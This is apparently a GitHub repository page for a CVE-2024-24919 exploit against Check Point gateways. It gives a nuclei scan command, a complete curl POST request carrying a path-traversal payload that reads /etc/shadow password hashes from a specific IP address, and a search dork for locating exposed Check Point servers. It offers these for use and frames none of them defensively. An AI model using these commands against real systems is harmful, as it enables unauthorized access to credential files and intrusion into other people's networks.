Skip to content

0xYumeko/CVE-2024-24919

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 

Repository files navigation

Check point:CVE-2024-24919

2024-05-31_08-14

run CVE

nuclei -list chick.txt -t CVE-2024-24919.yaml

Replace with the target IP address, and this command will attempt to access the /etc/shadow file, which contains password hashes.

curl --path-as-is -i -s -k -X POST \ -H 'Host: 117.102.198.7 ' \ -H 'Content-Length: 39' \ -H 'Connection: keep-alive' \ --data-binary 'aCSHELL/../../../../../../../etc/shadow' \ 'https://117.102.198.7/clients/MyCRL'

cve

Dork: "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages